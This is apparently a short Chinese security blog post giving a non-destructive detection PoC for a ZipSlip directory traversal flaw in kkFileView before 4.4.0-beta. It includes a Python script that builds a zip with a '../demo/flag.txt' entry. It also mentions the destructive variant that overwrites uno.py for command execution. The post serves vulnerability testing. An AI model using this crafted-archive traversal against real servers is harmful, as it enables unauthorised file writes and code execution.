KKfileview<4.4.0-beta 目录穿越漏洞无损测试Poc

· 2026-06-04 23:56 · 5 阅读

漏洞推送 2026-06-04 23:56 浙江

在kkFileView 4.4.0-beta以前,存在一处ZipSlip漏洞。攻击者可以利用该漏洞,向服务器任意目录下写入文件,导致任意命令执行漏洞。

具体poc可以参考:

https://github.com/vulhub/vulhub/blob/master/kkfileview/4.3-zipslip-rce/README.zh-cn.md

但是现在网络上的poc都有一个问题,就是直接修改了../../../../../../../../../../../../../../../../../../../opt/libreoffice7.5/program/uno.py,破坏性检测。

而且如果在服务器不除网或者,uno.py位置不正确的情况下,是无法执行命令的,也无法检测是否存在漏洞。

但是kkfileview本身会把demo文件夹下的文件全部列出来,所以我们可以用

    import zipfile


    if __name__ == "__main__":
        try:
            binary1 = b'vulhub'
            binary2 = b"falg\n"
            zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)
            # info = zipfile.ZipInfo("test.zip")
            zipFile.writestr("test", binary1)
            zipFile.writestr("../demo/flag.txt", binary2)
            zipFile.close()
        except IOError as e:
            raise e

    然后参考正常poc的流程,上传zip、预览以后,查看文件列表中是否出现了flag.txt文件即可

    跳转微信打开